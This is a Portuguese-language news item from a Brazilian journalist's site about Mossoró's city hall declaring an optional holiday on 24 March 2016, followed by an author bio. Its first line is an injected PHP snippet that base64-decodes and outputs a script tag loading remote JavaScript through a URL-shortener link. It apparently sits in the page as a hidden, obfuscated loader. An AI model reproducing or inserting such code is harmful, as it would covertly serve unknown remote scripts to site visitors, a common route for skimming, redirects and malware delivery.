$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Prefeitura de Mossoró decreta ponto facultativo nesta quinta-feira

Prefeitura de Mossoró decreta ponto facultativo nesta quinta-feira
24 Mar 2016

O decreto Nº 4.615, assinado pelo prefeito Francisco José Júnior e publicado no Jornal Oficial de Mossoró (JOM) de 23 de março, estabelece ponto facultativo nos órgãos da administração pública municipal direta e indireta para esta quinta-feira, 24, referente à data dedicada à Paixão de Cristo.

A publicação recomenda também que os dirigentes dos órgãos e entidades do Poder Executivo Municipal e da autarquia Previ-Mossoró preservem o funcionamento dos serviços essenciais de cada uma das respectivas áreas, para que não seja causado qualquer prejuízo à população.

O decreto informa ainda que caberá às autoridades competentes de cada órgão fiscalizar o cumprimento das disposições da publicação, assim como manter a regularidade dos serviços prestados à coletividade.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *